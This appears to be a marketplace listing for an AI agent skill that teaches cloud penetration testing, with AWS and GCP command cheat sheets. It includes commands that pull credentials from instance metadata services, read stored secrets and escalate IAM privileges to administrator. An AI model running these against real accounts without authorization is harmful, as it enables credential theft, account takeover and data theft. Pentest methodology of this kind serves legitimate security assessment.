AgentStack
Browse Sign in
Browse Why AgentStack Sell Docs
Sign in
SKILL verified Apache-2.0 Self-run

Exploiting Cloud Platforms

skill-evilfreelancer-secs-exploiting-cloud-platforms · by EvilFreelancer

Exploit AWS, Azure, and GCP cloud misconfigurations including S3 buckets, IAM roles, metadata services, serverless functions, and cloud-specific privilege escalation. Use when pentesting cloud environments or assessing cloud security.

No reviews yet
0 installs
0 views
view→install

Install

$ agentstack add skill-evilfreelancer-secs-exploiting-cloud-platforms

✓ scanned · ✓ verified, works with Claude Code, Cursor, and more.

Security review

✓ Passed

No issues found. Passed automated security review. · v0.1.0 How review works →

  • Prompt-injection patterns
  • Secret / credential exfiltration
  • Dangerous shell & filesystem operations
  • Untrusted network calls
  • Known-malicious package signatures

What it can access

  • Network access Used
  • Filesystem access No
  • Shell / process execution No
  • Environment & secrets No
  • Dynamic code execution No

From automated source analysis of v0.1.0. “Used” means the capability is present in the source — more access means more to trust, not that it’s unsafe.

View the full security report →

Verified badge

Passed review? Show it. Paste this badge into your README, it links to the public security report.

AgentStack Verified badge Links to your public security report.
[![AgentStack Verified](https://agentstack.voostack.com/badges/verified.svg)](https://agentstack.voostack.com/security/report/skill-evilfreelancer-secs-exploiting-cloud-platforms)

Reliability & compatibility

Security review passed
0 installs to date
no reviews yet
3d ago

Declared compatibility

Claude CodeClaude Desktop

Compatibility is declared by the source manifest. End-to-end runtime verification is coming, see below.

Preview Execution monitoring

We're building live execution health for every listing: tool-call success rate, median latency, uptime, and last-checked timestamps, measured, not self-reported. It isn't live yet, so we don't show numbers we can't stand behind.

How agent discovery & health will work →
Are you the author of Exploiting Cloud Platforms? Claim this listing to set pricing, connect Stripe payouts, and keep 70% of every sale.
Sign up to claim

About

Exploiting Cloud Platforms

When to Use

  • AWS, Azure, or GCP security assessment
  • Cloud misconfiguration exploitation
  • S3/Blob/Storage bucket hunting
  • Cloud IAM privilege escalation
  • Serverless function exploitation
  • Cloud metadata service abuse

When NOT to Use

  • On-premises Active Directory — use attacking-active-directory
  • Container and Kubernetes internals — use container-security
  • IaC and pipeline review from source — use auditing-supply-chain
  • Investigating a cloud compromise — use responding-to-incidents
  • Hardening an account's posture rather than attacking it — use

hardening-cloud-posture

Route to a Depth Skill

Cloud has grown several attack surfaces deep enough to warrant their own procedure skill. When the assessment narrows to one of these, switch — the IAM-and-storage methodology here does not carry their specific detail.

| Signal | Skill | | --- | --- | | A managed Kubernetes cluster (EKS/GKE/AKS): pod-to-cloud IMDS, IRSA/Workload Identity, k8s RBAC | container-security | | CI/CD pipeline with OIDC federation to the cloud: broad trust policies, runner compromise | auditing-supply-chain |

AWS Security

AWS CLI Setup

# Configure credentials
aws configure
# Or export directly
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
export AWS_DEFAULT_REGION=us-east-1

# Test credentials
aws sts get-caller-identity

# List available regions
aws ec2 describe-regions

S3 Bucket Enumeration

# List buckets
aws s3 ls

# List bucket contents
aws s3 ls s3://bucket-name/
aws s3 ls s3://bucket-name/ --recursive

# Download bucket contents
aws s3 sync s3://bucket-name/ ./local-folder/

# Check public access
aws s3api get-bucket-acl --bucket bucket-name
aws s3api get-bucket-policy --bucket bucket-name

# Test unauthenticated access
aws s3 ls s3://bucket-name/ --no-sign-request
curl https://bucket-name.s3.amazonaws.com/

S3 Bucket Discovery:

# Common naming patterns
company-backup
company-data
company-dev
company-prod
company-logs
company-assets

# Tools
# s3scanner
python3 s3scanner.py buckets.txt

# S3 Inspector
python3 s3inspector.py --bucket-file buckets.txt

IAM Enumeration

# Current user info
aws sts get-caller-identity

# List IAM users (if allowed)
aws iam list-users

# List user policies
aws iam list-attached-user-policies --user-name username
aws iam list-user-policies --user-name username

# Get policy details
aws iam get-policy --policy-arn arn:aws:iam::aws:policy/PolicyName
aws iam get-policy-version --policy-arn arn --version-id v1

# List roles
aws iam list-roles

# List groups
aws iam list-groups

EC2 Enumeration

# List instances
aws ec2 describe-instances

# Get instance metadata (from instance)
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name

# List security groups
aws ec2 describe-security-groups

# List key pairs
aws ec2 describe-key-pairs

# List snapshots
aws ec2 describe-snapshots --owner-ids self

# Public snapshots by account
aws ec2 describe-snapshots --owner-ids 123456789012 --restorable-by-user-ids all

Lambda Functions

# List functions
aws lambda list-functions

# Get function code
aws lambda get-function --function-name function-name

# Invoke function
aws lambda invoke --function-name function-name output.txt

# Get function configuration
aws lambda get-function-configuration --function-name function-name

RDS Enumeration

# List DB instances
aws rds describe-db-instances

# List DB snapshots
aws rds describe-db-snapshots

# Check if publicly accessible
aws rds describe-db-instances --query 'DBInstances[*].[DBInstanceIdentifier,PubliclyAccessible]'

Secrets Manager

# List secrets
aws secretsmanager list-secrets

# Get secret value
aws secretsmanager get-secret-value --secret-id secret-name

CloudTrail (Logging)

# Check if CloudTrail is enabled
aws cloudtrail describe-trails

# Check trail status
aws cloudtrail get-trail-status --name trail-name

# Get recent events
aws cloudtrail lookup-events

AWS Privilege Escalation

Common Misconfigurations:

# iam:CreatePolicyVersion - modify existing policies
# iam:SetDefaultPolicyVersion - set older policy version
# iam:PassRole + lambda:CreateFunction - execute code as role
# iam:AttachUserPolicy - attach admin policy to self
# iam:PutUserPolicy - add inline policy to self
# iam:CreateAccessKey - create keys for other users
# iam:UpdateAssumeRolePolicy - modify trust relationships

Exploitation Examples:

# Create access key for admin user (if iam:CreateAccessKey)
aws iam create-access-key --user-name admin-user

# Attach admin policy (if iam:AttachUserPolicy)
aws iam attach-user-policy --user-name current-user --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# PassRole + Lambda
aws lambda create-function --function-name evil --runtime python3.9 --role arn:aws:iam::ACCOUNT:role/AdminRole --handler lambda_function.lambda_handler --zip-file fileb://function.zip
aws lambda invoke --function-name evil output.txt

Azure Security

Azure CLI setup, Blob storage, VM/Azure AD enumeration, Function Apps, Key Vault, and metadata service commands live in the deep reference: [references/azure-command-reference.md](references/azure-command-reference.md).

GCP Security

gcloud Setup

# Login
gcloud auth login

# Login with service account
gcloud auth activate-service-account --key-file=key.json

# Get current account
gcloud config list

# List projects
gcloud projects list

Storage Bucket Enumeration

# List buckets
gsutil ls

# List bucket contents
gsutil ls gs://bucket-name/

# Download files
gsutil cp gs://bucket-name/file.txt ./

# Check bucket permissions
gsutil iam get gs://bucket-name/

# Test unauthenticated access
curl https://storage.googleapis.com/bucket-name/file.txt

Bucket Discovery:

# Common patterns
company-backup
company-data
company_backup
company_data

# GCPBucketBrute
python3 gcpbucketbrute.py -k company

Compute Engine

# List instances
gcloud compute instances list

# Get instance details
gcloud compute instances describe instance-name --zone=zone

# List disks
gcloud compute disks list

# List snapshots
gcloud compute snapshots list

# List firewall rules
gcloud compute firewall-rules list

IAM Enumeration

# List service accounts
gcloud iam service-accounts list

# Get IAM policy
gcloud projects get-iam-policy PROJECT_ID

# List roles
gcloud iam roles list

# Describe role
gcloud iam roles describe roles/editor

Cloud Functions

# List functions
gcloud functions list

# Describe function
gcloud functions describe function-name --region=region

# Download source code (if accessible)
gcloud functions describe function-name --region=region --format="value(sourceArchiveUrl)"

GCP Metadata Service

# From GCP VM
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true" -H "Metadata-Flavor: Google"

# Get access token
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"

# Get service account email
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" -H "Metadata-Flavor: Google"

Cloud Exploitation Tools

AWS:

# Pacu - AWS exploitation framework
python3 pacu.py

# ScoutSuite - Security auditing
python3 scout.py aws

# Prowler - Security assessment
./prowler -M csv

# WeirdAAL - AWS attack library
python3 weirdAAL.py

Azure:

# MicroBurst - PowerShell toolkit
Import-Module MicroBurst.psm1
Invoke-EnumerateAzureBlobs
Invoke-EnumerateAzureSubDomains

# ScoutSuite
python3 scout.py azure

# ROADtools - Azure AD
roadrecon auth
roadrecon gather
roadrecon gui

GCP:

# ScoutSuite
python3 scout.py gcp

# GCP-IAM-Privilege-Escalation
# Check for privilege escalation paths

Quick Cloud Wins

AWS:

  • Public S3 buckets with sensitive data
  • Overly permissive IAM policies
  • Unencrypted snapshots
  • Public RDS instances
  • Lambda functions with secrets in environment variables
  • EC2 metadata service abuse (SSRF)

Azure:

  • Public blob storage containers
  • Overly permissive RBAC
  • Exposed Key Vault secrets
  • Public-facing VMs with weak credentials
  • Function apps with hardcoded secrets

GCP:

  • Public storage buckets
  • Overly permissive IAM bindings
  • Public compute instances
  • Service account key exposure
  • Cloud Functions with secrets in code

Common Cloud Misconfigurations

  1. Public Storage - S3/Blob/GCS buckets with public read/write
  2. Excessive Permissions - Overly permissive IAM/RBAC policies
  3. Exposed Secrets - Keys/passwords in code, environment variables
  4. No MFA - Critical accounts without multi-factor authentication
  5. Open Security Groups - 0.0.0.0/0 access on sensitive ports
  6. Unencrypted Data - Storage/databases without encryption
  7. Default Credentials - Services using default passwords
  8. Exposed Metadata - SSRF to cloud metadata services
  9. Public Snapshots - EBS/disk snapshots publicly accessible
  10. CloudTrail Disabled - No logging of API calls

ATT&CK Coverage

Generated from secskills-core/ttp-index.json — edit that file, then run python3 scripts/sync_attack.py --write. Re-verify IDs against the current ATT&CK release before citing them in a report.

Initial Access (TA0001)

  • T1078 Valid Accounts (also Persistence, Privilege Escalation, Defense Evasion)_ — see also cracking-passwords, attacking-active-directory
  • T1078.004 Cloud Accounts (also Persistence)_
  • T1199 Trusted Relationship — see also auditing-supply-chain

Persistence (TA0003)

  • T1098.001 Additional Cloud Credentials — see also responding-to-incidents

Credential Access (TA0006)

  • T1528 Steal Application Access Token — see also testing-apis
  • T1552 Unsecured Credentials — see also escalating-linux-privileges, auditing-supply-chain
  • T1552.005 Cloud Instance Metadata API — see also testing-web-applications, container-security

Discovery (TA0007)

  • T1069 Permission Groups Discovery — see also attacking-active-directory
  • T1087 Account Discovery — see also attacking-active-directory
  • T1526 Cloud Service Discovery

Collection (TA0009)

  • T1530 Data from Cloud Storage

Impact (TA0040)

  • T1496 Resource Hijacking — see also hunting-threats

Detection content for any of these: engineering-detections. Proactive search: hunting-threats. Post-compromise: responding-to-incidents.

References

  • https://book.hacktricks.xyz/pentesting-web/buckets
  • https://github.com/RhinoSecurityLabs/pacu
  • https://github.com/NetSPI/MicroBurst
  • https://github.com/nccgroup/ScoutSuite
  • https://cloudsecdocs.com/

Source & license

This open-source skill is cataloged on AgentStack and links to its original source — we do not rehost the code.

Install and usage instructions live in the source repository linked above.

Reviews

No reviews yet, be the first.

Versions

  • v0.1.0 Imported from the upstream source.